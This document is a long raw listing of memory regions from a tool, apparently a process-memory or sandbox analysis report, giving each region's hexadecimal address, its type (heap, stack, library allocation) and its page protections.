heap
page read and write
1B8AC2A1000
heap
page read and write
281ACBF4000
heap
page read and write
1F8B2731000
heap
page read and write
211E2F91000
heap
page read and write
16CEEF74000
heap
page read and write
1B59E000
stack
page read and write
FC6000
heap
page read and write
65A9D7E000
stack
page read and write
7FFD9A7B0000
trusted library allocation
page read and write
7FFE0EC6A000
unkown
page execute and write copy
2224A820000
trusted library allocation
page read and write
1FCD61A5000
heap
page read and write
1EC76450000
heap
page read and write
1B8AC235000
heap
page read and write
1FCD67DC000
heap
page read and write
24630386000
trusted library allocation
page read and write
23BCC913000
heap
page read and write
16CEEF72000
heap
page read and write
1CC34E61000
heap
page read and write
281AC9AD000
heap
page read and write
C00000
trusted library allocation
page read and write
2224F107000
trusted library allocation
page read and write
1C84B000
stack
page read and write
281AB697000
heap
page read and write
16CEEF64000
heap
page read and write
281AC0BE000
heap
page read and write
281AC960000
direct allocation
page read and write
2684AF04000
heap
page read and write
281ACEF4000
heap
page read and write
7FFD9A80C000
trusted library allocation
page execute and read and write
2646BB23000
heap
page read and write
281AC0C6000
heap
page read and write
1DFEFC6C000
heap
page read and write
BFA91FE000
unkown
page read and write
21B7ADF4000
heap
page read and write
7FFD9A7DB000
trusted library allocation
page execute and read and write
7FFD9AAF0000
trusted library allocation
page read and write
281AC9D5000
heap
page read and write
1AFD3000
heap
page read and write
1AF90000
heap
page execute and read and write
174F1A31000
trusted library allocation
page read and write
174F19CE000
heap
page read and write
2F003FE000
unkown
page readonly
1C09AB86000
heap
page read and write
281AC9AB000
heap
page read and write
281ABF24000
heap
page read and write
281ABA3C000
heap
page read and write
19525F95000
heap
page read and write
2A1302A9000
heap
page read and write
29E02F68000
heap
page read and write
21B794F2000
heap
page read and write
281ABF3F000
heap
page read and write
281ABA5E000
heap
page read and write
21B79512000
heap
page read and write
31AC000
trusted library allocation
page read and write
281ABA6D000
heap
page read and write
1F234F0D000
trusted library allocation
page read and write
174F194A000
heap
page read and write
7FFD9A82C000
trusted library allocation
page execute and read and write
1C099239000
heap
page read and write
1412F72B000
heap
page read and write
7FFD9A7B4000
trusted library allocation
page read and write
23E907AA000
heap
page read and write
2EDDDFF000
stack
page read and write
2224F0F1000
trusted library allocation
page read and write
280FEFF000
unkown
page read and write
2224A015000
heap
page read and write
25B4F179000
heap
page read and write
281ACA05000
heap
page read and write
7FFDFAA37000
unkown
page execute and read and write
1CA952B2000
heap
page read and write
AB6B55C000
stack
page read and write
70EAF8D000
stack
page read and write
281AC11E000
heap
page read and write
1DFEFC63000
heap
page read and write
1D3722C0000
heap
page read and write
26469ABE000
heap
page read and write
281ACBB0000
heap
page read and write
281ABF52000
heap
page read and write
281AC544000
direct allocation
page read and write
281ACB6F000
heap
page read and write
281ACA2F000
heap
page read and write
2224ED11000
trusted library allocation
page read and write
1B3F6A71000
heap
page read and write
1FCD633A000
heap
page read and write
157F000
stack
page read and write
2074DD74000
heap
page read and write
23BCC8CF000
heap
page read and write
7FFD9ABE0000
trusted library allocation
page read and write
281AC9AD000
heap
page read and write
281ACA20000
heap
page read and write
E7F000
stack
page read and write
1E880104000
heap
page read and write
23BCE99D000
heap
page read and write
1495000
heap
page read and write
281AC073000
heap
page read and write
2646A2B5000
heap
page read and write
215478B0000
heap
page read and write
281AC07E000
heap
page read and write
1DFEFCA9000
heap
page read and write
131A1000
trusted library allocation
page read and write
7FFE0EBF0000
unkown
page execute and read and write
281AC092000
heap
page read and write
26469B2A000
heap
page read and write
1B5DF000
stack
page read and write
174F19CE000
heap
page read and write
1C098A10000
heap
page read and write
281ACB6D000
heap
page read and write
1FCD618E000
heap
page read and write
174F1942000
heap
page read and write
1D0CCDD0000
heap
page read and write
1C829B70000
heap
page read and write
21B78FD0000
heap
page read and write
1C09922E000
heap
page read and write
7FFD9A7BD000
trusted library allocation
page execute and read and write
281ACA11000
heap
page read and write
281AC101000
heap
page read and write
281ACB65000
heap
page read and write
21B78F20000
heap
page read and write
26469ACF000
heap
page read and write
2BD1000
trusted library allocation
page read and write
1F23D3EC000
heap
page read and write
2646A13A000
heap
page read and write
1CA953A0000
heap
page read and write
1FCD6184000
heap
page read and write
7FFD9A8B0000
trusted library allocation
page execute and read and write
21B7ADEE000
heap
page read and write
174F1A2E000
trusted library allocation
page read and write
1DFEFBA0000
heap
page read and write
281AC9DC000
heap
page read and write
1F224E91000
trusted library allocation
page read and write
16CEEF7D000
heap
page read and write
23BCCB10000
heap
page read and write
1C099220000
heap
page read and write
281AC99D000
heap
page read and write
1E880000000
heap
page read and write
1B36E000
stack
page read and write
281AC033000
heap
page read and write
ED8000
heap
page read and write
7FF71F136000
unkown
page read and write
2C30000
heap
page execute and read and write
22249750000
heap
page read and write
281AC8A0000
direct allocation
page read and write
1AF2D000
stack
page read and write
281ACFCB000
heap
page read and write
23BCC8D7000
heap
page read and write
281ABE48000
heap
page read and write
7FFD9AA5D000
trusted library allocation
page read and write
65A9DFF000
stack
page read and write
7FFD9A7C4000
trusted library allocation
page read and write
281AC11A000
heap
page read and write
7FFD9A850000
trusted library allocation
page read and write
19525FDD000
heap
page read and write
C20000
trusted library allocation
page read and write
174F1944000
heap
page read and write
2224A113000
heap
page read and write
281AC03D000
heap
page read and write
195247C6000
heap
page read and write
7FFDFB543000
unkown
page execute and read and write
281AC51C000
direct allocation
page read and write
50D2BFF000
unkown
page read and write
7FFE0EC11000
unkown
page execute and read and write
1FCD6327000
heap
page read and write
2C40AFF000
stack
page read and write
7FFD9A7D0000
trusted library allocation
page read and write
281ABF4C000
heap
page read and write
13E1000
heap
page read and write
19522D6B000
heap
page read and write
23BCCB1A000
heap
page read and write
1DFEFDB0000
heap
page read and write
13C9000
heap
page read and write
281ABAE4000
heap
page read and write
17D13C51000
heap
page read and write
1D37210F000
heap
page read and write
21B78F6E000
heap
page read and write
2DDB4DF0000
heap
page read and write
1C09923C000
heap
page read and write
21B78FC8000
heap
page read and write
21B78EDD000
heap
page read and write
281ABA0F000
heap
page read and write
2262D9F0000
heap
page read and write
2646A2B2000
heap
page read and write
195259AF000
heap
page read and write
16CEEDF0000
heap
page read and write
281AC990000
heap
page read and write
281ABF4F000
heap
page read and write
7FFD9A9C0000
trusted library allocation
page read and write
7FFD9A890000
trusted library allocation
page execute and read and write
3A0000
heap
page read and write
7375CF4000
stack
page read and write
1BFD045B000
heap
page read and write
7FF71F138000
unkown
page readonly
2262DA21000
heap
page read and write
2224EE62000
heap
page read and write
1DFEFC49000
heap
page read and write
281AC9D1000
heap
page read and write
7FF71F090000
unkown
page readonly
21B794EF000
heap
page read and write
16CEEEFB000
heap
page read and write
174F1A64000
trusted library allocation
page read and write
281ABAE4000
heap
page read and write
281ACBF5000
heap
page read and write
1C09922E000
heap
page read and write
2646A29F000
heap
page read and write
281ABEC3000
heap
page read and write
7FFD9A856000
trusted library allocation
page read and write
281AC8A0000
direct allocation
page read and write
1C098C57000
heap
page read and write
246303E4000
trusted library allocation
page read and write
281AB95E000
heap
page read and write
C2F178F000
stack
page read and write
1DFF2FF0000
direct allocation
page read and write
227EEE10000
heap
page read and write
1BECE000
heap
page read and write
23671126000
heap
page read and write
7FFE0EC64000
unkown
page execute and read and write
1E8FFE4B000
heap
page read and write
281ABF60000
heap
page read and write
281ABF24000
heap
page read and write
1C09920E000
heap
page read and write
281AC9D5000
heap
page read and write
7FFD9AB20000
trusted library allocation
page read and write
281AC04F000
heap
page read and write
264FC1CB000
heap
page read and write
127D000
heap
page read and write
281ACB37000
heap
page read and write
23BCE991000
heap
page read and write
174F1A29000
trusted library allocation
page read and write
6E51BDF000
unkown
page read and write
1CE5D000
stack
page read and write
23BCE99E000
heap
page read and write
281AC07D000
heap
page read and write
281AC03E000
heap
page read and write
281ABF04000
heap
page read and write
281ABB0A000
heap
page read and write
7FFE148BC000
unkown
page read and write
7FF71F124000
unkown
page read and write
281ACBAE000
heap
page read and write
281ACB6C000
heap
page read and write
281AB6D6000
heap
page read and write
1FCD6184000
heap
page read and write
15E849D0000
heap
page read and write
174F1A62000
trusted library allocation
page read and write
281AC03D000
heap
page read and write
7FFD9A7A4000
trusted library allocation
page read and write
2A04CEF0000
heap
page read and write
1FCD633D000
heap
page read and write
1FCD61D3000
heap
page read and write
84DB4FE000
stack
page read and write
2E4F000
trusted library allocation
page read and write
281AB6C2000
heap
page read and write
281ADB40000
direct allocation
page read and write
7FFDFF252000
unkown
page execute and read and write
1C098C56000
heap
page read and write
7FFDF85B2000
unkown
page execute and read and write
29E031F0000
heap
page read and write
16CEEF52000
heap
page read and write
281AC991000
heap
page read and write
174F0EFB000
trusted library allocation
page read and write
1DFEFC6C000
heap
page read and write
21B78FCA000
heap
page read and write
281ACEC0000
heap
page read and write
281ABF4F000
heap
page read and write
16CEF079000
heap
page read and write
174F199E000
heap
page read and write
2A75F530000
heap
page read and write
281ABFBF000
heap
page read and write
22249813000
heap
page read and write
281AB65D000
heap
page read and write
70EA53B000
stack
page read and write
1E835A31000
heap
page read and write
1DFEFC46000
heap
page read and write
281AC11A000
heap
page read and write
281ACD3F000
heap
page read and write
281AC0A4000
heap
page read and write
21B78FB4000
heap
page read and write
281ACFCB000
heap
page read and write
2224F008000
trusted library allocation
page read and write
25F37A11000
heap
page read and write
2684AF2B000
heap
page read and write
1F23D1D6000
heap
page read and write
23BCC93E000
heap
page read and write
23BCCB17000
heap
page read and write
7FFD9A942000
trusted library allocation
page read and write
281AC9D1000
heap
page read and write
1240000
heap
page read and write
281AD190000
direct allocation
page read and write
1D37210F000
heap
page read and write
2A04CEE0000
heap
page read and write
281AC118000
heap
page read and write
2224EEC1000
heap
page read and write
281AC9DC000
heap
page read and write
2462EF5F000
trusted library allocation
page read and write
1DFEFC2B000
heap
page read and write
174F199E000
heap
page read and write
7375CE2000
stack
page read and write
281ACA20000
heap
page read and write
1C099217000
heap
page read and write
2B319FF000
stack
page read and write
7FFD9ABF0000
trusted library allocation
page read and write
23BCC925000
heap
page read and write
281AC8B0000
direct allocation
page read and write
19522D80000
heap
page read and write
BFA90FB000
stack
page read and write
281AC11A000
heap
page read and write
281AC09E000
heap
page read and write
21B78FA5000
heap
page read and write
19525FF5000
heap
page read and write
16CEEF16000
heap
page read and write
125D2000
trusted library allocation
page read and write
7FFD9A994000
trusted library allocation
page read and write
70E9B43000
stack
page read and write
1D373A90000
heap
page read and write
174F199B000
heap
page read and write
23671133000
heap
page read and write
174F6252000
trusted library allocation
page read and write
281ABF64000
heap
page read and write
7FFD9AA30000
trusted library allocation
page read and write
174F199B000
heap
page read and write
2538CB54000
heap
page read and write
1A94B000
heap
page read and write
2367112B000
heap
page read and write
1CC34E61000
heap
page read and write
1DFF30F0000
direct allocation
page read and write
2E4C000
trusted library allocation
page read and write
15E848D0000
heap
page read and write
281AB9CC000
heap
page read and write
70EA43E000
stack
page read and write
77D000
heap
page read and write
2462F9A3000
trusted library allocation
page read and write
16CEEF23000
heap
page read and write
1DFEFC0E000
heap
page read and write
1EC76621000
heap
page read and write
227EEDF0000
heap
page read and write
281AC994000
heap
page read and write
1340000
heap
page read and write
281AB9D6000
heap
page read and write
195247C6000
heap
page read and write
26469B25000
heap
page read and write
1FCD8162000
heap
page read and write
23671102000
heap
page read and write
281AC8B0000
direct allocation
page read and write
174F19A5000
heap
page read and write
F20C9AC000
stack
page read and write
1C098C54000
heap
page read and write
281AD1F0000
direct allocation
page read and write
281ABF4C000
heap
page read and write
281ABF4F000
heap
page read and write
1DFEFC0D000
heap
page read and write
174F0F02000
trusted library allocation
page read and write
26469AFC000
heap
page read and write
23699F20000
heap
page read and write
2155A7CD000
heap
page read and write
7DF4C1470000
trusted library allocation
page execute and read and write
7FFDFA9C8000
unkown
page execute and read and write
7FFD9A8B6000
trusted library allocation
page execute and read and write
281AC998000
heap
page read and write
281AD320000
heap
page read and write
1EC76600000
heap
page read and write
EC461FF000
stack
page read and write
1B8AC2A1000
heap
page read and write
F20000
heap
page read and write
F9A000
heap
page read and write
C80000
heap
page read and write
281ABF5C000
heap
page read and write
281ACB6F000
heap
page read and write
1C09921C000
heap
page read and write
2646A28C000
heap
page read and write
281AC101000
heap
page read and write
174F1120000
trusted library allocation
page read and write
281AC980000
direct allocation
page read and write
1BA6E000
stack
page read and write
2C409FF000
unkown
page read and write
281AC0BC000
heap
page read and write
23671030000
heap
page read and write
281AB62C000
heap
page read and write
7FFD9A7AD000
trusted library allocation
page execute and read and write
24646FA0000
heap
page read and write
281ABA1B000
heap
page read and write
281ABA0C000
heap
page read and write
FE7547F000
stack
page read and write
195246D4000
heap
page read and write
2224ECF0000
trusted library allocation
page read and write
281ABF52000
heap
page read and write
211E2F7A000
heap
page read and write
7FFD9AAD0000
trusted library allocation
page read and write
1C098C57000
heap
page read and write
FA9000
heap
page read and write
1F224D90000
heap
page readonly
281AC330000
direct allocation
page read and write
1DFEFC01000
heap
page read and write
1D372110000
heap
page read and write
281AC11B000
heap
page read and write
16CEEEDE000
heap
page read and write
7FF71F13E000
unkown
page readonly
2A04D2F0000
heap
page read and write
174F1928000
heap
page read and write
21B78F68000
heap
page read and write
1DFEFAA0000
heap
page read and write
281ACEC1000
heap
page read and write
7FFE130CC000
unkown
page read and write
222498FF000
heap
page read and write
CE8000
heap
page read and write
1DA818A1000
heap
page read and write
1FCD614D000
heap
page read and write
2224EEED000
heap
page read and write
23BCE99E000
heap
page read and write
281ABF76000
heap
page read and write
281AC9C0000
heap
page read and write
280FB3C000
stack
page read and write
7FF64489B000
unkown
page readonly
1FCD8174000
heap
page read and write
1FCD6080000
trusted library allocation
page read and write
16CEEF63000
heap
page read and write
1D6BCF50000
heap
page read and write
264FC1F4000
heap
page read and write
FD9000
heap
page read and write
281AB6AF000
heap
page read and write
26469A95000
heap
page read and write
7FFE11EE2000
unkown
page execute and write copy
23BCC921000
heap
page read and write
1100000
heap
page read and write
281ACB37000
heap
page read and write
1EC76621000
heap
page read and write
CA8000
heap
page read and write
2E51000
trusted library allocation
page read and write
7FFD9A8A6000
trusted library allocation
page execute and read and write
281ACBEB000
heap
page read and write
24647170000
heap
page read and write
281ABF48000
heap
page read and write
1DFF3110000
direct allocation
page read and write
281AB633000
heap
page read and write
2224F018000
trusted library allocation
page read and write
26469A89000
heap
page read and write
16CF0B0D000
heap
page read and write
281ABAAD000
heap
page read and write
281ABA70000
heap
page read and write
1FCD6177000
heap
page read and write
16CEEEDD000
heap
page read and write
7FFE0EC31000
unkown
page execute and write copy
1FCD6080000
trusted library allocation
page read and write
1FCD67F5000
heap
page read and write
281AC037000
heap
page read and write
281ACBF5000
heap
page read and write
1BECC000
heap
page read and write
264FC100000
heap
page read and write
70EA0FE000
stack
page read and write
14CC0915000
heap
page read and write
24647053000
heap
page read and write
24630217000
trusted library allocation
page read and write
1DFF30B0000
direct allocation
page read and write
7FFDFAE86000
unkown
page execute and read and write
281AC033000
heap
page read and write
2A75F970000
heap
page read and write
281AC8B0000
direct allocation
page read and write
281AC11E000
heap
page read and write
281ABF24000
heap
page read and write
2367112E000
heap
page read and write
1DFEFC25000
heap
page read and write
211E3180000
heap
page read and write
CA5000
heap
page read and write
281AC0C6000
heap
page read and write
2F7F68B000
stack
page read and write
1DFEFDB4000
heap
page read and write
21B78FBB000
heap
page read and write
23F4758B000
heap
page read and write
1A75000
heap
page read and write
299E000
stack
page read and write
281ABF5C000
heap
page read and write
2262DA32000
heap
page read and write
281AB5FF000
heap
page read and write
174F199C000
heap
page read and write
1F23D2A0000
heap
page execute and read and write
1D37210F000
heap
page read and write
12A5E0CC000
heap
page read and write
21B78FD6000
heap
page read and write
16CEEF24000
heap
page read and write
281ABF13000
heap
page read and write
26469A57000
heap
page read and write
1B3F6A50000
heap
page read and write
26469B1C000
heap
page read and write
23BCE993000
heap
page read and write
1F224E80000
heap
page read and write
7FFD9A896000
trusted library allocation
page execute and read and write
1CA952AB000
heap
page read and write
1C829E00000
heap
page read and write
23BCD02D000
heap
page read and write
1369000
heap
page read and write
2074DB10000
heap
page read and write
2224985B000
heap
page read and write
281AD5C0000
direct allocation
page read and write
1C099239000
heap
page read and write
281ACD9D000
heap
page read and write
281ABF39000
heap
page read and write
1DFF3166000
direct allocation
page read and write
24630323000
trusted library allocation
page read and write
2BDC000
trusted library allocation
page read and write
174F0EFE000
trusted library allocation
page read and write
281ABE15000
heap
page read and write
2B318FF000
unkown
page read and write
1B3F69A0000
heap
page read and write
19525FBD000
heap
page read and write
26469CFE000
heap
page read and write
21B78F72000
heap
page read and write
76651FF000
stack
page read and write
2224EF00000
heap
page read and write
281ACD43000
heap
page read and write
7FFDFAEA0000
unkown
page read and write
1F224A10000
trusted library allocation
page read and write
281AC9E1000
heap
page read and write
281AC970000
direct allocation
page read and write
25F377FD000
heap
page read and write
281AC069000
heap
page read and write
1C099202000
heap
page read and write
281AC9AD000
heap
page read and write
7FFE148B1000
unkown
page execute and read and write
25F377B0000
heap
page read and write
281AB95F000
heap
page read and write
1DFF2FD0000
direct allocation
page read and write
281AB6BF000
heap
page read and write
21B78FDE000
heap
page read and write
281AC9AB000
heap
page read and write
16CEEF16000
heap
page read and write
281AC066000
heap
page read and write
2074DD80000
heap
page read and write
9AB1AFF000
stack
page read and write
2A1302A0000
heap
page read and write
16CEEF27000
heap
page read and write
21B78FB4000
heap
page read and write
E1D59FF000
stack
page read and write
160026E1000
heap
page read and write
2DDB4EB5000
heap
page read and write
281AB9EB000
heap
page read and write
9E05EFF000
unkown
page read and write
19525F9F000
heap
page read and write
2646BB22000
heap
page read and write
281A9CCA000
heap
page read and write
281ABFBF000
heap
page read and write
2E20000
heap
page execute and read and write
174F0EFB000
trusted library allocation
page read and write
281AC9C4000
heap
page read and write
281AB6D6000
heap
page read and write
7FFE148B9000
unkown
page execute and read and write
1D37210F000
heap
page read and write
1B72D000
stack
page read and write
1C829B90000
heap
page read and write
7FFDFF191000
unkown
page execute and read and write
174F199D000
heap
page read and write
19525FFD000
heap
page read and write
174F1A60000
heap
page read and write
1B8AC299000
heap
page read and write
7FFD9A8C0000
trusted library allocation
page execute and read and write
113C000
heap
page read and write
7FFD9AA70000
trusted library allocation
page read and write
281AC9CA000
heap
page read and write
281AC0BE000
heap
page read and write
19525FF5000
heap
page read and write
2224F056000
trusted library allocation
page read and write
7FFD9A980000
trusted library allocation
page execute and read and write
281AB4E0000
direct allocation
page read and write
7FFD9A7E4000
trusted library allocation
page read and write
1DC5D080000
heap
page read and write
2DDB4EDB000
heap
page read and write
EF9000
heap
page read and write
281ABF5C000
heap
page read and write
26469AA5000
heap
page read and write
281ABE41000
heap
page read and write
281AC04F000
heap
page read and write
19524FB9000
heap
page read and write
6284CFF000
unkown
page read and write
23BCC8C0000
heap
page read and write
19525F28000
heap
page read and write
16CEEF58000
heap
page read and write
174F19CE000
heap
page read and write
7FFE14646000
unkown
page execute and read and write
281ABF76000
heap
page read and write
281AC098000
heap
page read and write
21B794E8000
heap
page read and write
21B78FD9000
heap
page read and write
281ACD47000
heap
page read and write
281AB675000
heap
page read and write
1D37210F000
heap
page read and write
281AB66A000
heap
page read and write
2463EAB1000
trusted library allocation
page read and write
19522D6B000
heap
page read and write
22249874000
heap
page read and write
281ABA66000
heap
page read and write
CE76DBC000
stack
page read and write
211E2F91000
heap
page read and write
7FFD9A932000
trusted library allocation
page read and write
7FFD9A896000
trusted library allocation
page execute and read and write
281AC8E0000
direct allocation
page read and write
7FFD9A7A1000
trusted library allocation
page read and write
1C09AB8D000
heap
page read and write
13068000
trusted library allocation
page read and write
23671132000
heap
page read and write
264FC1F1000
heap
page read and write
2262D870000
heap
page read and write
F00000
heap
page read and write
19525FC3000
heap
page read and write
3071000
trusted library allocation
page read and write
281ABA5E000
heap
page read and write
281AC508000
direct allocation
page read and write
16CEEF6B000
heap
page read and write
1D0CD010000
heap
page read and write
281AC9A5000
heap
page read and write
281ABFBF000
heap
page read and write
1D6BD017000
heap
page read and write
2A75F5E1000
heap
page read and write
BA03177000
stack
page read and write
7D3000
heap
page read and write
16CF0AE0000
heap
page read and write
7FFE13211000
unkown
page execute and read and write
2224EEC8000
heap
page read and write
1E835BE0000
heap
page read and write
1FCD6199000
heap
page read and write
23BCC915000
heap
page read and write
B0FD7EF000
stack
page read and write
281AB604000
heap
page read and write
2646BB34000
heap
page read and write
B3A9E7E000
stack
page read and write
281AC8C0000
direct allocation
page read and write
1B134000
heap
page read and write
281AB6BF000
heap
page read and write
2A04D120000
heap
page read and write
DB0000
heap
page read and write
23BCD031000
heap
page read and write
7FFDF85FE000
unkown
page execute and read and write
281ABE41000
heap
page read and write
281ABE5F000
heap
page read and write
281AC11A000
heap
page read and write
1FCD67EC000
heap
page read and write
16CEEF72000
heap
page read and write
19522CF3000
heap
page read and write
7FF644871000
unkown
page execute read
281AC033000
heap
page read and write
24646FB0000
heap
page read and write
281ABF64000
heap
page read and write
BA030FF000
stack
page read and write
264FC1F5000
heap
page read and write
16CEEEEB000
heap
page read and write
281ABE6A000
heap
page read and write
2DDB4EDB000
heap
page read and write
1C099204000
heap
page read and write
1FCD61A3000
heap
page read and write
264699E0000
heap
page read and write
281AC8D0000
direct allocation
page read and write
281AC120000
direct allocation
page read and write
21B79509000
heap
page read and write
281ACB4B000
heap
page read and write
21B78FA2000
heap
page read and write
1F23D1E2000
heap
page read and write
15E84B04000
heap
page read and write
2646A2AF000
heap
page read and write
16CEEF6B000
heap
page read and write
2224F06F000
trusted library allocation
page read and write
21B78FD2000
heap
page read and write
1C09AB83000
heap
page read and write
281ABD20000
heap
page read and write
19525F88000
heap
page read and write
281ACA01000
heap
page read and write
281ABF4C000
heap
page read and write
281ABF13000
heap
page read and write
2462D110000
heap
page read and write
281AC524000
direct allocation
page read and write
1FCD61CA000
heap
page read and write
19525FDE000
heap
page read and write
1330000
heap
page read and write
21B78F50000
heap
page read and write
281AB647000
heap
page read and write
22249780000
trusted library allocation
page read and write
16CEEF74000
heap
page read and write
281AC9C2000
heap
page read and write
174F1932000
heap
page read and write
26469CFD000
heap
page read and write
195257AF000
heap
page read and write
2646A294000
heap
page read and write
26469B38000
heap
page read and write
1FCD8161000
heap
page read and write
16CEEF33000
heap
page read and write
16CEEF76000
heap
page read and write
76650FF000
stack
page read and write
13F1000
heap
page read and write
19525FF6000
heap
page read and write
16CEEF6E000
heap
page read and write
281AC9CA000
heap
page read and write
281ACD7C000
heap
page read and write
281AB969000
heap
page read and write
281ABF4C000
heap
page read and write
115A000
heap
page read and write
281AB6D8000
heap
page read and write
281AB963000
heap
page read and write
281ABA40000
heap
page read and write
23F8ADB4000
heap
page read and write
25F379F0000
heap
page read and write
1C50E000
stack
page read and write
2462EA17000
heap
page execute and read and write
227EEE10000
heap
page read and write
1CC34E61000
heap
page read and write
281ABE2F000
heap
page read and write
1DFEFB80000
heap
page read and write
1F22529E000
trusted library allocation
page read and write
E269EFF000
stack
page read and write
21B79519000
heap
page read and write
1FCD61A3000
heap
page read and write
12A5E394000
heap
page read and write
281AC8B0000
direct allocation
page read and write
16CEEF6B000
heap
page read and write
16CEEF52000
heap
page read and write
F20CCFE000
stack
page read and write
281AC098000
heap
page read and write
7FFD9A794000
trusted library allocation
page read and write
1DB92000
heap
page read and write
7FFE1A45C000
unkown
page execute and write copy
281ACBF5000
heap
page read and write
19522CB4000
heap
page read and write
FC9000
heap
page read and write
281AC033000
heap
page read and write
281AC9D1000
heap
page read and write
26469C30000
heap
page read and write
281A9CC6000
heap
page read and write
19525FAB000
heap
page read and write
21B78F5A000
heap
page read and write
1F234EA1000
trusted library allocation
page read and write
212531B0000
heap
page read and write
1CC34DC0000
heap
page read and write
7FFD9A7FC000
trusted library allocation
page execute and read and write
174F19A5000
heap
page read and write
1B105000
heap
page read and write
1F222FE0000
heap
page read and write
1B5ED000
stack
page read and write
174F1A3A000
trusted library allocation
page read and write
1E835A31000
heap
page read and write
2462D070000
heap
page read and write
26469AA8000
heap
page read and write
281ABF64000
heap
page read and write
281ABF48000
heap
page read and write
14CC0910000
heap
page read and write
2224F2E0000
trusted library allocation
page read and write
23699F7C000
heap
page read and write
1B3D0000
heap
page execute and read and write
23BCD01F000
heap
page read and write
281ACFCB000
heap
page read and write
281AB6D6000
heap
page read and write
7FFDFB049000
unkown
page execute and read and write
281ABFBF000
heap
page read and write
1D3720E0000
heap
page read and write
14CC0610000
heap
page read and write
281AB64A000
heap
page read and write
211E3330000
heap
page read and write
2262DA07000
heap
page read and write
281ACA20000
heap
page read and write
1BEC0000
heap
page read and write
1F223105000
heap
page read and write
19525F81000
heap
page read and write
D306FE000
stack
page read and write
23BCD011000
heap
page read and write
281AB6BF000
heap
page read and write
70E9EFE000
stack
page read and write
1DFEFC9D000
heap
page read and write
1CC34E59000
heap
page read and write
281ABF4C000
heap
page read and write
21B78FC3000
heap
page read and write
1AFD0000
heap
page read and write
1D37210F000
heap
page read and write
2538CA41000
heap
page read and write
2BDF000
trusted library allocation
page read and write
2646BB24000
heap
page read and write
1B950000
heap
page read and write
12F1000
stack
page read and write
1CA95140000
heap
page read and write
21B794F1000
heap
page read and write
281AC9C6000
heap
page read and write
1C099228000
heap
page read and write
21B794FC000
heap
page read and write
16CEEF23000
heap
page read and write
7FFDFAD86000
unkown
page execute and read and write
1C098C42000
heap
page read and write
281AB674000
heap
page read and write
195247C9000
heap
page read and write
19525FC3000
heap
page read and write
23F47580000
heap
page read and write
1A70000
heap
page read and write
7FFE0EC5C000
unkown
page execute and read and write
2DDB4EDB000
heap
page read and write
26469AE7000
heap
page read and write
281AC03E000
heap
page read and write
281AC540000
direct allocation
page read and write
1B3F6A71000
heap
page read and write
1FCD67C7000
heap
page read and write
281AB6A1000
heap
page read and write
70E9E7F000
stack
page read and write
70EA4BE000
stack
page read and write
7FF6448AE000
unkown
page read and write
281ABA40000
heap
page read and write
281AC102000
heap
page read and write
1D373AB0000
heap
page read and write
174F0EFE000
trusted library allocation
page read and write
1C099207000
heap
page read and write
1FCD6184000
heap
page read and write
160026C0000
heap
page read and write
2224EF1F000
heap
page read and write
2224F360000
trusted library allocation
page read and write
21253210000
heap
page read and write
281ABF4F000
heap
page read and write
1B0DC000
stack
page read and write
25B4F181000
heap
page read and write
1DFF3150000
direct allocation
page read and write
1418000
heap
page read and write
1B4DF000
stack
page read and write
21B79509000
heap
page read and write
1D37210F000
heap
page read and write
281AC900000
direct allocation
page read and write
281ABA20000
heap
page read and write
1C09AB82000
heap
page read and write
1DFEFC00000
heap
page read and write
21B78F52000
heap
page read and write
7FFD9A79D000
trusted library allocation
page execute and read and write
14CC061B000
heap
page read and write
2462D10A000
heap
page read and write
16CEEEEA000
heap
page read and write
281AC528000
direct allocation
page read and write
26469B38000
heap
page read and write
22249913000
heap
page read and write
281AB64C000
heap
page read and write
2074DA90000
heap
page read and write
129A8000
trusted library allocation
page read and write
2A04CF71000
heap
page read and write
281AB6A1000
heap
page read and write
B3A9ADB000
stack
page read and write
2155A7D8000
heap
page read and write
2A75F5E1000
heap
page read and write
281ABF60000
heap
page read and write
9AB19FF000
unkown
page read and write
27A15FF000
unkown
page read and write
7FFD9A8D0000
trusted library allocation
page execute and read and write
19525F9F000
heap
page read and write
281ACF71000
heap
page read and write
B3A9B5F000
stack
page read and write
23BCC92A000
heap
page read and write
1FCD6080000
trusted library allocation
page read and write
38132FF000
unkown
page read and write
23BCCB7A000
heap
page read and write
131B1000
trusted library allocation
page read and write
C107BFF000
unkown
page read and write
1FCD61C7000
heap
page read and write
281AC09E000
heap
page read and write
2462D390000
heap
page read and write
7FFE1A45B000
unkown
page execute and read and write
281AD1B0000
direct allocation
page read and write
12A7000
heap
page read and write
E1D58FF000
unkown
page read and write
281ACB6D000
heap
page read and write
21B79509000
heap
page read and write
7FFD9AAC0000
trusted library allocation
page read and write
12A5E0D0000
heap
page read and write
1DFF3239000
direct allocation
page read and write
29E02F60000
heap
page read and write
2224EEC3000
heap
page read and write
21B78F55000
heap
page read and write
7DFC9FF000
unkown
page read and write
281AB66C000
heap
page read and write
1F235188000
trusted library allocation
page read and write
281AC11E000
heap
page read and write
21B78EDA000
heap
page read and write
84DB2FC000
stack
page read and write
281AC08B000
heap
page read and write
2224F08E000
trusted library allocation
page read and write
7FFD9A992000
trusted library allocation
page read and write
F09000
heap
page read and write
DB0000
heap
page read and write
19525FFD000
heap
page read and write
281AB6C0000
heap
page read and write
281ABF52000
heap
page read and write
2462CF90000
heap
page read and write
7FFDFAA12000
unkown
page execute and read and write
FF0000
heap
page read and write
1F23D3C7000
heap
page read and write
12BD3000
trusted library allocation
page read and write
38133FF000
stack
page read and write
1CA952A0000
heap
page read and write
7FF71F119000
unkown
page write copy
7FFD9AA90000
trusted library allocation
page read and write
19522CF5000
heap
page read and write
7FFD9A7D4000
trusted library allocation
page read and write
7FF6448B4000
unkown
page readonly
1B3CD000
stack
page read and write
2464731B000
heap
page read and write
24646B01000
heap
page read and write
7FFDF8669000
unkown
page read and write
15A0000
trusted library allocation
page read and write
281AC8A0000
direct allocation
page read and write
174F199B000
heap
page read and write
6F2BBFF000
stack
page read and write
16CEEF60000
heap
page read and write
23F8AB10000
heap
page read and write
B0FD76F000
stack
page read and write
1FCD6147000
heap
page read and write
26469AD6000
heap
page read and write
25F37815000
heap
page read and write
281ABF4C000
heap
page read and write
1279000
heap
page read and write
7FFD9AAD0000
trusted library allocation
page read and write
D10000
unkown
page readonly
2462FC11000
trusted library allocation
page read and write
EC5F8FE000
unkown
page read and write
2538CA41000
heap
page read and write
19522D20000
heap
page read and write
B0FD6EC000
stack
page read and write
281AB9C1000
heap
page read and write
281AC07E000
heap
page read and write
26469AAF000
heap
page read and write
281AB6B2000
heap
page read and write
1C098C42000
heap
page read and write
2224F0A3000
trusted library allocation
page read and write
12A5E0DE000
heap
page read and write
1B970000
heap
page execute and read and write
174F1920000
heap
page read and write
